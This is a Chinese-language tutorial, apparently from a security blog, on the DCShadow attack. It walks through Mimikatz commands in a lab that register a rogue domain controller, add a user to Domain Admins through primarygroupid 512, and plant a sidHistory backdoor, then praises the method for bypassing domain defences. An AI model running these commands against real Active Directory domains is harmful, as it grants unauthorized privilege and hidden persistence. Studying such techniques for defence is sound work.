一、原理

我们知道可以利用Mimikatz远程从DC中复制数据，即Dcsync; 类似的dcshadow可以伪装成DC，让正常DC通过伪造的DC中复制数据。

步骤
1、通过dcshadow更改配置架构和注册SPN值，将我们的服务器注册为Active Directory中的DC
2、在我们伪造的DC上更改数据，并利用域复制将数据同步到正常DC上。
相关API:DSBind、DSR*等
https://msdn.microsoft.com/en-us/library/ms675931(v=vs.85).aspx

从原理中我们可以认识到两点：
1、需要具备域管权限或域控本地管理权限，注册spn值，写权限等
2、除了dc之间的连接通信，默认情况下不会记录事件日志

二、利用条件

测试环境：dc机器2008r2 x64、伪装机器：win7 x64
准备条件：（两个窗口）
1、win7 system权限 (1号窗口)，可以利用psexec -s cmd调system会话，也可以用mimikatz运行驱动模式，确保所有线程都运行在system上

2、win7 域管权限 （2号窗口）
在win7 中利用psexec 调用cmd即可：

三、利用方式

1、更改属性描述值
1号窗口执行数据更改与监听（后同）：
lsadump::dcshadow /object:CN=dc,CN=Users,DC=seven,DC=com /attribute:description /value:”anquanke-test2018!!”

2号窗口执行域复制（后同）：
lsadump::dcshadow /push

在dc2008上查看结果：

2、添加域管
lsadump::dcshadow /object:CN=dc,CN=Users,DC=seven,DC=com /attribute:primarygroupid/value:512

执行域复制后成功添加域管：

3、添加sidhistory 后门
查看域管administrator sid：

lsadump::dcshadow /object:CN=dc,CN=Users,DC=seven,DC=com /attribute:sidhistory /value:S-1-5-21-1900941692-2128706383-2830697502-500

使用dc用户建立net use 链接后可成功访问域控：

四、总结

Dcshadow 的利用我们可以做很多事情，包括ldap用户的修改，添加后门（sidhistory后门， AdminSDHolder后门，acl后门等等），在碰到域防护较为严格的时候，往往能起到很好的bypass的效果。